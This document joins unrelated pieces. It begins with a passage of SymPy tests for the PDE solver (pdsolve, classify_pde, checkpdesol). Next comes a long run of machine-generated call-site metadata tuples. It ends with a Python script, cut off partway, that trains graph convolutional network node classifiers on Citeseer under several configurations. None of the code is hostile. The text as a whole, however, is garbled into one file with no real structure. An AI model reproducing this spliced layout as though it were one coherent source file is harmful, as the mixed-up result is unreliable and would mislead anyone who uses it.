assert sol == Eq(f(x, y), F(x - y)*exp(-x/2 - y/2) + exp(x + y)/3)
assert classify_pde(eq) == ('1st_linear_constant_coeff',
'1st_linear_constant_coeff_Integral')
assert checkpdesol(eq, sol)[0]
eq = 2*u + -u.diff(x) + 3*u.diff(y) + sin(x)
sol = pdsolve(eq)
assert sol == Eq(f(x, y),
F(3*x + y)*exp(x/5 - 3*y/5) - 2*sin(x)/5 - cos(x)/5)
assert classify_pde(eq) == ('1st_linear_constant_coeff',
'1st_linear_constant_coeff_Integral')
assert checkpdesol(eq, sol)[0]
eq = u + u.diff(x) + u.diff(y) + x*y
sol = pdsolve(eq)
assert sol.expand() == Eq(f(x, y),
x + y + (x - y)**2/4 - (x + y)**2/4 + F(x - y)*exp(-x/2 - y/2) - 2).expand()
assert classify_pde(eq) == ('1st_linear_constant_coeff',
'1st_linear_constant_coeff_Integral')
assert checkpdesol(eq, sol)[0]
eq = u + u.diff(x) + u.diff(y) + log(x)
assert classify_pde(eq) == ('1st_linear_constant_coeff',
'1st_linear_constant_coeff_Integral')
def test_pdsolve_all():
f, F = map(Function, ['f', 'F'])
u = f(x,y)
eq = u + u.diff(x) + u.diff(y) + x**2*y
sol = pdsolve(eq, hint = 'all')
keys = ['1st_linear_constant_coeff',
'1st_linear_constant_coeff_Integral', 'default', 'order']
assert sorted(sol.keys()) == keys
assert sol['order'] == 1
assert sol['default'] == '1st_linear_constant_coeff'
assert sol['1st_linear_constant_coeff'].expand() == Eq(f(x, y),
-x**2*y + x**2 + 2*x*y - 4*x - 2*y + F(x - y)*exp(-x/2 - y/2) + 6).expand()
def test_pdsolve_variable_coeff():
f, F = map(Function, ['f', 'F'])
u = f(x, y)
eq = x*(u.diff(x)) - y*(u.diff(y)) + y**2*u - y**2
sol = pdsolve(eq, hint="1st_linear_variable_coeff")
assert sol == Eq(u, F(x*y)*exp(y**2/2) + 1)
assert checkpdesol(eq, sol)[0]
eq = x**2*u + x*u.diff(x) + x*y*u.diff(y)
sol = pdsolve(eq, hint='1st_linear_variable_coeff')
assert sol == Eq(u, F(y*exp(-x))*exp(-x**2/2))
assert checkpdesol(eq, sol)[0]
eq = y*x**2*u + y*u.diff(x) + u.diff(y)
sol = pdsolve(eq, hint='1st_linear_variable_coeff')
assert sol == Eq(u, F(-2*x + y**2)*exp(-x**3/3))
assert checkpdesol(eq, sol)[0]
eq = exp(x)**2*(u.diff(x)) + y
sol = pdsolve(eq, hint='1st_linear_variable_coeff')
assert sol == Eq(u, y*exp(-2*x)/2 + F(y))
assert checkpdesol(eq, sol)[0]
eq = exp(2*x)*(u.diff(y)) + y*u - u
sol = pdsolve(eq, hint='1st_linear_variable_coeff')
assert sol == Eq(u, F(x)*exp(-y*(y - 2)*exp(-2*x)/2))
| [((9, 16, 9, 36), 'sympy.symbols', 'symbols', ({(9, 24, 9, 35): '"""a b c x y"""'}, {}), "('a b c x y')", False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((12, 17, 12, 35), 'sympy.symbols', 'symbols', ({(12, 25, 12, 34): '"""x,y,z,t"""'}, {}), "('x,y,z,t')", False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((21, 17, 21, 35), 'sympy.symbols', 'symbols', ({(21, 25, 21, 34): '"""x,y,z,t"""'}, {}), "('x,y,z,t')", False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((29, 17, 29, 35), 'sympy.symbols', 'symbols', ({(29, 25, 29, 34): '"""x,y,z,t"""'}, {}), "('x,y,z,t')", False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((30, 8, 30, 30), 'sympy.Symbol', 'Symbol', (), '', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((31, 10, 31, 25), 'sympy.Function', 'Function', ({(31, 19, 31, 24): '"""Phi"""'}, {}), "('Phi')", False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((33, 18, 33, 38), 'sympy.symbols', 'symbols', ({(33, 26, 33, 37): '"""r,theta,z"""'}, {}), "('r,theta,z')", False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((67, 9, 67, 22), 'sympy.Eq', 'Eq', ({(67, 12, 67, 18): 'res[1]', (67, 20, 67, 21): 'c'}, {}), '(res[1], c)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((79, 11, 79, 25), 'sympy.symbols', 'symbols', ({(79, 19, 79, 24): '"""x t"""'}, {}), "('x t')", False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((80, 9, 80, 35), 'sympy.symbols', 'symbols', (), '', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((81, 11, 81, 39), 'sympy.symbols', 'symbols', (), '', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((91, 8, 91, 21), 'sympy.Function', 'Function', ({(91, 17, 91, 20): '"""f"""'}, {}), "('f')", False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((119, 10, 119, 22), 'sympy.solvers.pde.pdsolve', 'pdsolve', ({(119, 18, 119, 21): 'eq4'}, {}), '(eq4)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((120, 11, 120, 35), 'sympy.Eq', 'Eq', ({(120, 14, 120, 31): 'sol.lhs - sol.rhs', (120, 33, 120, 34): '0'}, {}), '(sol.lhs - sol.rhs, 0)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((138, 10, 138, 21), 'sympy.solvers.pde.pdsolve', 'pdsolve', ({(138, 18, 138, 20): 'eq'}, {}), '(eq)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((144, 10, 144, 21), 'sympy.solvers.pde.pdsolve', 'pdsolve', ({(144, 18, 144, 20): 'eq'}, {}), '(eq)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((150, 10, 150, 21), 'sympy.solvers.pde.pdsolve', 'pdsolve', ({(150, 18, 150, 20): 'eq'}, {}), '(eq)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((155, 10, 155, 21), 'sympy.solvers.pde.pdsolve', 'pdsolve', ({(155, 18, 155, 20): 'eq'}, {}), '(eq)', False, 'from 
sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((163, 10, 163, 21), 'sympy.solvers.pde.pdsolve', 'pdsolve', ({(163, 18, 163, 20): 'eq'}, {}), '(eq)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((171, 10, 171, 21), 'sympy.solvers.pde.pdsolve', 'pdsolve', ({(171, 18, 171, 20): 'eq'}, {}), '(eq)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((178, 10, 178, 21), 'sympy.solvers.pde.pdsolve', 'pdsolve', ({(178, 18, 178, 20): 'eq'}, {}), '(eq)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((186, 10, 186, 21), 'sympy.solvers.pde.pdsolve', 'pdsolve', ({(186, 18, 186, 20): 'eq'}, {}), '(eq)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((201, 10, 201, 35), 'sympy.solvers.pde.pdsolve', 'pdsolve', (), '', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((215, 10, 215, 55), 'sympy.solvers.pde.pdsolve', 'pdsolve', (), '', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((220, 10, 220, 55), 'sympy.solvers.pde.pdsolve', 'pdsolve', (), '', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((225, 10, 225, 55), 'sympy.solvers.pde.pdsolve', 'pdsolve', (), '', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((230, 10, 230, 55), 'sympy.solvers.pde.pdsolve', 'pdsolve', (), '', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((235, 10, 235, 55), 'sympy.solvers.pde.pdsolve', 'pdsolve', (), '', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((128, 11, 128, 23), 'sympy.solvers.pde.pdsolve', 'pdsolve', ({(128, 19, 128, 22): 'eq1'}, {}), '(eq1)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((129, 11, 129, 35), 'sympy.solvers.pde.pdsolve', 'pdsolve', (), '', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((130, 11, 130, 35), 'sympy.solvers.pde.pdsolve', 'pdsolve', (), '', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((137, 11, 137, 27), 'sympy.solvers.pde.classify_pde', 'classify_pde', ({(137, 24, 137, 26): 'eq'}, {}), '(eq)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((140, 11, 140, 31), 'sympy.solvers.pde.checkpdesol', 'checkpdesol', ({(140, 23, 140, 25): 'eq', (140, 27, 140, 30): 'sol'}, {}), '(eq, sol)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((143, 11, 143, 27), 'sympy.solvers.pde.classify_pde', 'classify_pde', ({(143, 24, 143, 26): 'eq'}, {}), '(eq)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, 
pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((146, 11, 146, 31), 'sympy.solvers.pde.checkpdesol', 'checkpdesol', ({(146, 23, 146, 25): 'eq', (146, 27, 146, 30): 'sol'}, {}), '(eq, sol)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((149, 11, 149, 27), 'sympy.solvers.pde.classify_pde', 'classify_pde', ({(149, 24, 149, 26): 'eq'}, {}), '(eq)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((152, 11, 152, 31), 'sympy.solvers.pde.checkpdesol', 'checkpdesol', ({(152, 23, 152, 25): 'eq', (152, 27, 152, 30): 'sol'}, {}), '(eq, sol)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((156, 11, 156, 31), 'sympy.solvers.pde.checkpdesol', 'checkpdesol', ({(156, 23, 156, 25): 'eq', (156, 27, 156, 30): 'sol'}, {}), '(eq, sol)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((162, 44, 162, 56), 'sympy.exp', 'exp', ({(162, 48, 162, 55): '(x + 3 * y)'}, {}), '(x + 3 * y)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((166, 11, 166, 27), 'sympy.solvers.pde.classify_pde', 'classify_pde', ({(166, 24, 166, 26): 'eq'}, {}), '(eq)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((168, 11, 168, 31), 'sympy.solvers.pde.checkpdesol', 'checkpdesol', ({(168, 23, 168, 25): 'eq', (168, 27, 168, 30): 'sol'}, {}), '(eq, sol)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((173, 11, 173, 27), 'sympy.solvers.pde.classify_pde', 'classify_pde', ({(173, 24, 173, 26): 'eq'}, {}), '(eq)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((175, 11, 175, 31), 'sympy.solvers.pde.checkpdesol', 'checkpdesol', ({(175, 23, 175, 25): 'eq', (175, 27, 175, 30): 'sol'}, {}), '(eq, sol)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((177, 42, 177, 48), 'sympy.sin', 'sin', ({(177, 46, 177, 47): 'x'}, {}), '(x)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((181, 11, 181, 27), 'sympy.solvers.pde.classify_pde', 'classify_pde', ({(181, 24, 181, 26): 'eq'}, {}), '(eq)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((183, 11, 183, 31), 'sympy.solvers.pde.checkpdesol', 'checkpdesol', ({(183, 23, 183, 25): 'eq', (183, 27, 183, 30): 'sol'}, {}), '(eq, sol)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((189, 11, 189, 27), 'sympy.solvers.pde.classify_pde', 'classify_pde', ({(189, 24, 189, 26): 'eq'}, {}), '(eq)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((191, 11, 191, 31), 'sympy.solvers.pde.checkpdesol', 'checkpdesol', ({(191, 23, 191, 25): 'eq', (191, 27, 191, 30): 'sol'}, {}), '(eq, sol)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((192, 37, 192, 
43), 'sympy.log', 'log', ({(192, 41, 192, 42): 'x'}, {}), '(x)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((193, 11, 193, 27), 'sympy.solvers.pde.classify_pde', 'classify_pde', ({(193, 24, 193, 26): 'eq'}, {}), '(eq)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((217, 11, 217, 31), 'sympy.solvers.pde.checkpdesol', 'checkpdesol', ({(217, 23, 217, 25): 'eq', (217, 27, 217, 30): 'sol'}, {}), '(eq, sol)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((222, 11, 222, 31), 'sympy.solvers.pde.checkpdesol', 'checkpdesol', ({(222, 23, 222, 25): 'eq', (222, 27, 222, 30): 'sol'}, {}), '(eq, sol)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((227, 11, 227, 31), 'sympy.solvers.pde.checkpdesol', 'checkpdesol', ({(227, 23, 227, 25): 'eq', (227, 27, 227, 30): 'sol'}, {}), '(eq, sol)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((232, 11, 232, 31), 'sympy.solvers.pde.checkpdesol', 'checkpdesol', ({(232, 23, 232, 25): 'eq', (232, 27, 232, 30): 'sol'}, {}), '(eq, sol)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((99, 15, 99, 31), 'sympy.solvers.pde.classify_pde', 'classify_pde', ({(99, 28, 99, 30): 'eq'}, {}), '(eq)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((101, 15, 101, 31), 'sympy.solvers.pde.classify_pde', 'classify_pde', ({(101, 28, 101, 30): 'eq'}, {}), '(eq)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((122, 8, 122, 52), 'sympy.solvers.pde.checkpdesol', 'checkpdesol', (), '', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((170, 46, 170, 56), 'sympy.exp', 'exp', ({(170, 50, 170, 55): '(x + y)'}, {}), '(x + y)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((110, 31, 110, 42), 'sympy.solvers.pde.pdsolve', 'pdsolve', ({(110, 39, 110, 41): 'eq'}, {}), '(eq)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((114, 29, 114, 41), 'sympy.solvers.pde.pdsolve', 'pdsolve', ({(114, 37, 114, 40): 'eq5'}, {}), '(eq5)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((114, 43, 114, 55), 'sympy.solvers.pde.pdsolve', 'pdsolve', ({(114, 51, 114, 54): 'eq6'}, {}), '(eq6)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((118, 31, 118, 42), 'sympy.solvers.pde.pdsolve', 'pdsolve', ({(118, 39, 118, 41): 'eq'}, {}), '(eq)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((128, 48, 128, 63), 'sympy.exp', 'exp', ({(128, 52, 128, 62): '(-x / 2 - y / 2)'}, {}), '(-x / 2 - y / 2)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((129, 60, 129, 75), 'sympy.exp', 'exp', ({(129, 64, 129, 
74): '(-x / 2 - y / 2)'}, {}), '(-x / 2 - y / 2)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((130, 60, 130, 75), 'sympy.exp', 'exp', ({(130, 64, 130, 74): '(-x / 2 - y / 2)'}, {}), '(-x / 2 - y / 2)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((139, 33, 139, 44), 'sympy.exp', 'exp', ({(139, 37, 139, 43): '(-x - y)'}, {}), '(-x - y)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((165, 46, 165, 53), 'sympy.exp', 'exp', ({(165, 50, 165, 52): '(-y)'}, {}), '(-y)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((221, 37, 221, 49), 'sympy.exp', 'exp', ({(221, 41, 221, 48): '(-x ** 2 / 2)'}, {}), '(-x ** 2 / 2)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((226, 39, 226, 51), 'sympy.exp', 'exp', ({(226, 43, 226, 50): '(-x ** 3 / 3)'}, {}), '(-x ** 3 / 3)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((229, 9, 229, 15), 'sympy.exp', 'exp', ({(229, 13, 229, 14): 'x'}, {}), '(x)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((234, 9, 234, 17), 'sympy.exp', 'exp', ({(234, 13, 234, 16): '(2 * x)'}, {}), '(2 * x)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((172, 39, 172, 54), 'sympy.exp', 'exp', ({(172, 43, 172, 53): '(-x / 2 - y / 2)'}, {}), '(-x / 2 - y / 2)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((172, 57, 172, 67), 'sympy.exp', 'exp', ({(172, 61, 172, 66): '(x + y)'}, {}), '(x + y)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((180, 52, 180, 58), 'sympy.cos', 'cos', ({(180, 56, 180, 57): 'x'}, {}), '(x)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((216, 31, 216, 42), 'sympy.exp', 'exp', ({(216, 35, 216, 41): '(y ** 2 / 2)'}, {}), '(y ** 2 / 2)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((165, 18, 165, 26), 'sympy.exp', 'exp', ({(165, 22, 165, 25): '(x / 2)'}, {}), '(x / 2)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((165, 29, 165, 41), 'sympy.exp', 'exp', ({(165, 33, 165, 40): '(x + 4 * y)'}, {}), '(x + 4 * y)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((180, 20, 180, 36), 'sympy.exp', 'exp', ({(180, 24, 180, 35): '(x / 5 - 3 * y / 5)'}, {}), '(x / 5 - 3 * y / 5)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((221, 28, 221, 35), 'sympy.exp', 'exp', ({(221, 32, 221, 34): '(-x)'}, {}), '(-x)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((231, 26, 231, 35), 'sympy.exp', 'exp', ({(231, 30, 231, 34): '(-2 * x)'}, {}), '(-2 * x)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((151, 46, 151, 51), 'sympy.core.S', 'S', ({(151, 48, 151, 50): '(85)'}, {}), '(85)', False, 'from sympy.core import S\n'), ((151, 58, 151, 63), 'sympy.core.S', 'S', ({(151, 60, 151, 62): '(85)'}, {}), '(85)', False, 'from sympy.core import S\n'), ((180, 41, 180, 47), 'sympy.sin', 'sin', ({(180, 45, 180, 
46): 'x'}, {}), '(x)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((236, 44, 236, 53), 'sympy.exp', 'exp', ({(236, 48, 236, 52): '(-2 * x)'}, {}), '(-2 * x)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((115, 42, 115, 46), 'sympy.core.S', 'S', ({(115, 44, 115, 45): '(5)'}, {}), '(5)', False, 'from sympy.core import S\n'), ((115, 53, 115, 57), 'sympy.core.S', 'S', ({(115, 55, 115, 56): '(5)'}, {}), '(5)', False, 'from sympy.core import S\n'), ((116, 43, 116, 48), 'sympy.core.S', 'S', ({(116, 45, 116, 47): '(10)'}, {}), '(10)', False, 'from sympy.core import S\n'), ((116, 55, 116, 60), 'sympy.core.S', 'S', ({(116, 57, 116, 59): '(10)'}, {}), '(10)', False, 'from sympy.core import S\n'), ((145, 55, 145, 59), 'sympy.core.S', 'S', ({(145, 57, 145, 58): '(8)'}, {}), '(8)', False, 'from sympy.core import S\n'), ((188, 55, 188, 70), 'sympy.exp', 'exp', ({(188, 59, 188, 69): '(-x / 2 - y / 2)'}, {}), '(-x / 2 - y / 2)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((208, 54, 208, 69), 'sympy.exp', 'exp', ({(208, 58, 208, 68): '(-x / 2 - y / 2)'}, {}), '(-x / 2 - y / 2)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((145, 42, 145, 47), 'sympy.core.S', 'S', ({(145, 44, 145, 46): '(12)'}, {}), '(12)', False, 'from sympy.core import S\n')] |
EasternJournalist/learn-deep-learning | GCN/GCN.py | cc424713ffc57b8a796ebd81354a1b887f9c5092 | import torch
import torch.nn.functional as F
import pandas as pd
import numpy as np
from torch_geometric.data import Data
from torch_geometric.nn import GCNConv, PairNorm
from torch_geometric.utils.undirected import to_undirected
import random
import matplotlib.pyplot as plt
data_name = 'citeseer' # 'cora' or 'citeseer'
data_edge_path = f'datasets/{data_name}/{data_name}.cites'
data_content_path = f'datasets/{data_name}/{data_name}.content'
raw_content = pd.read_table(data_content_path, header=None, dtype={0: str})  # plain str: the np.str alias was removed in NumPy 1.24
raw_edge = pd.read_table(data_edge_path, header=None, dtype=str)
paper_ids = raw_content[0]
paper_id_map = {}
for i, pp_id in enumerate(paper_ids):
paper_id_map[pp_id] = i
edge_index = torch.from_numpy(raw_edge.apply(lambda col: col.map(paper_id_map)).dropna().values).long().t().contiguous()
x = torch.from_numpy(raw_content.values[:, 1:-1].astype(np.float64)).float()  # np.float64 instead of the removed np.float alias
labels = np.unique(raw_content[raw_content.keys()[-1]]).tolist()
y = torch.from_numpy(raw_content[raw_content.keys()[-1]].map(lambda x: labels.index(x)).values).long()
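# Training mask: randomly sample 30 nodes per class; all remaining nodes form the test set.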
def get_mask(y:torch.tensor):
train_mask = torch.tensor([False] * y.shape[0])
for i in torch.unique(y).unbind():
temp = torch.arange(0, y.shape[0])[y == i].tolist()
random.shuffle(temp)
train_mask[temp[:30]] = True
train_mask = torch.tensor(train_mask)
test_mask = train_mask == False
return train_mask, test_mask
train_mask, test_mask = get_mask(y)
data = Data(x=x, edge_index=edge_index, y=y, train_mask=train_mask, test_mask=test_mask)
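# DropEdge-style augmentation: randomly keep only a keep_ratio fraction of the edges for one forward pass.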
def drop_edge(edge_index, keep_ratio:float=1.):
num_keep = int(keep_ratio * edge_index.shape[1])
temp = [True] * num_keep + [False] * (edge_index.shape[1] - num_keep)
random.shuffle(temp)
return edge_index[:, temp]
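# A configurable GCN node classifier: stacked GCNConv layers (optionally with self-loops,
# PairNorm and DropEdge), a configurable activation, and a final GCNConv producing class logits.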
class GCNNodeClassifier(torch.nn.Module):
def __init__(self,
dim_features,
num_classes,
num_layers,
add_self_loops:bool=True,
use_pairnorm:bool=False,
drop_edge:float=1.,
activation:str='relu',
undirected:bool=False
):
super(GCNNodeClassifier, self).__init__()
dim_hidden = 32
self.gconvs = torch.nn.ModuleList(
[GCNConv(in_channels=dim_features, out_channels=dim_hidden, add_self_loops=add_self_loops)]
+ [GCNConv(in_channels=dim_hidden, out_channels=dim_hidden, add_self_loops=add_self_loops) for i in range(num_layers - 2)]
)
self.final_conv = GCNConv(in_channels=dim_hidden, out_channels=num_classes, add_self_loops=add_self_loops)
self.use_pairnorm = use_pairnorm
if self.use_pairnorm:
self.pairnorm = PairNorm()
self.drop_edge = drop_edge
activations_map = {'relu':torch.relu, 'tanh':torch.tanh, 'sigmoid':torch.sigmoid, 'leaky_relu':torch.nn.LeakyReLU(0.1)}
self.activation_fn = activations_map[activation]
def forward(self, x, edge_index):
for l in self.gconvs:
edges = drop_edge(edge_index, self.drop_edge)
x = l(x, edges)
if self.use_pairnorm:
x = self.pairnorm(x)
x = self.activation_fn(x)
x = self.final_conv(x, edge_index)
return x
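# Accuracy: fraction of nodes whose argmax logit matches the ground-truth label.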
def eval_acc(y_pred, y):
return ((torch.argmax(y_pred, dim=-1) == y).float().sum() / y.shape[0]).item()
num_epochs = 100
test_cases = [
{'num_layers':2, 'add_self_loops':True, 'use_pairnorm':False, 'drop_edge':1., 'activation':'relu', 'undirected':False},
# num layers
{'num_layers':4, 'add_self_loops':True, 'use_pairnorm':False, 'drop_edge':1., 'activation':'relu', 'undirected':False},
{'num_layers':6, 'add_self_loops':True, 'use_pairnorm':False, 'drop_edge':1., 'activation':'relu', 'undirected':False},
# self loop
{'num_layers':2, 'add_self_loops':False, 'use_pairnorm':False, 'drop_edge':1., 'activation':'relu', 'undirected':False},
# pair norm
{'num_layers':2, 'add_self_loops':True, 'use_pairnorm':True, 'drop_edge':1., 'activation':'relu', 'undirected':False},
{'num_layers':4, 'add_self_loops':True, 'use_pairnorm':True, 'drop_edge':1., 'activation':'relu', 'undirected':False},
{'num_layers':6, 'add_self_loops':True, 'use_pairnorm':True, 'drop_edge':1., 'activation':'relu', 'undirected':False},
# drop edge
{'num_layers':2, 'add_self_loops':True, 'use_pairnorm':False, 'drop_edge':0.6, 'activation':'relu', 'undirected':False},
{'num_layers':4, 'add_self_loops':True, 'use_pairnorm':False, 'drop_edge':0.6, 'activation':'relu', 'undirected':False},
# activation fn
{'num_layers':2, 'add_self_loops':True, 'use_pairnorm':False, 'drop_edge':1., 'activation':'tanh', 'undirected':False},
{'num_layers':2, 'add_self_loops':True, 'use_pairnorm':False, 'drop_edge':1., 'activation':'leaky_relu', 'undirected':False},
# undirected
{'num_layers':2, 'add_self_loops':True, 'use_pairnorm':False, 'drop_edge':1., 'activation':'relu', 'undirected':True},
{'num_layers':4, 'add_self_loops':True, 'use_pairnorm':True, 'drop_edge':1., 'activation':'relu', 'undirected':True},
{'num_layers':4, 'add_self_loops':True, 'use_pairnorm':False, 'drop_edge':0.8, 'activation':'relu', 'undirected':True},
]
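# Train each configuration from scratch for num_epochs and track its test accuracy per epoch.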
for i_case, kwargs in enumerate(test_cases):
print(f'Test Case {i_case:>2}')
model = GCNNodeClassifier(x.shape[1], len(labels), **kwargs)
optimizer = torch.optim.Adam(model.parameters(), lr=1e-3)
